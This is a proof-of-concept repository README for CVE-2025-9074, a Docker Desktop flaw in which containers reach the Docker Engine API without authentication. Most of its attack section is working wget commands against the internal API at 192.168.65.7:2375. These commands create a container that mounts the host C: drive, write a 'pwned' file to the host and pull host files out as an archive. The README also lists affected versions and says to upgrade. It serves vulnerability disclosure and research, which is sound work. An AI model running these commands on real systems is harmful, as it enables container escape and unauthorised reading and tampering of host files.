CVE-2025-9074 PoC — Docker Desktop allows unauthenticated access to Docker Engine API from containers

Source

Associated Vulnerability

Readme

# CVE-2025-9074 – Full Docker Escape on Windows & macOS Docker Desktop

## 📌 Description
A flaw in Docker Desktop’s internal HTTP API allowed containers to reach the service without authentication or access controls.  
This enabled the creation of new containers with host volumes mounted, giving read/write access to the host file system.

## 📝 References
- [CVE-2025-9074 Record](https://www.cve.org/CVERecord?id=CVE-2025-9074)  
- [Docker Desktop Release Notes](https://docs.docker.com/desktop/release-notes/#4443)  
- [Felix Boulet’s Research](https://blog.qwertysecurity.com/Articles/blog3.html)  

## 🎯 Affected Versions
- Docker Desktop **≤ 4.44.3** on Windows and macOS

## ⚙️ Proof of Concept (PoC)

### Requirements
- Docker Desktop prior to **4.44.3**  
- Running under a user with privileges matching the targeted mounted folder  

### Steps to Reproduce
1. On Windows, create a `C:\test` folder with a sample file (e.g., `readme.txt`).  
   ![poc 1](poc_1.png)  

2. Launch a simple container (e.g., `alpine` using `docker run -it alpine '/bin/sh'`) and run:
    ```sh
    # Create container with host volume mounted
    wget --header='Content-Type: application/json' \
      --post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /host_root/test/pwn.txt"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' \
      -O - http://192.168.65.7:2375/containers/create > create.json

    # Extract container ID
    cid=$(cut -d'"' -f4 create.json)

    # Start container
    wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
    ```

   **Explanation**:  
   - The POST request creates a container mounting `C:\` into `/host_root`, then writes `pwn.txt`.  
   - The container ID is parsed from the response.  
   - A second POST request starts the container.  

3. To read files, request an archive from the container:
    ```sh
    wget http://192.168.65.7:2375/containers/$cid/archive?path=/host_root/test -O test.tar
    tar -xvf test.tar
    cat test/readme.txt
    ```
   **Explanation**:  
   - The GET request fetches an archive of the host-mounted directory.  
   - Extracting it reveals host files accessible inside the container.  

### Expected Result
1. `C:\test\pwn.txt` is created from within the container.  
   ![poc 2](poc_2.png)  
2. The container can read host files such as `C:\test\readme.txt`.  
   ![poc 3](poc_3.png)  

⚠️ **Note**: This PoC demonstrates the vulnerability safely and does not include weaponized exploit code.

## 🛡️ Mitigation
- For Windows and Mac users, **upgrade** to Docker Desktop **≥ 4.44.3**  

## ⚠️ Disclaimer
This PoC is for **educational and research purposes only**. The author assumes **no liability for misuse**. 

---

## 🙏 Attribution
This PoC and README are **derived from research by [Felix Boulet](https://blog.qwertysecurity.com/Articles/blog3.html)**.  
All credit for the original discovery and analysis belongs to the original author.  

---

## 📜 License
This project is licensed under the [MIT License](LICENSE). 

File Snapshot

 [4.0K]  /data/pocs/e2138b699c2c6d0c02dbc1a5d2cba25446ed4db6
├── [1.0K]  LICENSE
├── [ 27K]  poc_1.png
├── [ 18K]  poc_2.png
├── [ 20K]  poc_3.png
└── [3.0K]  README.md

0 directories, 5 files

Remarks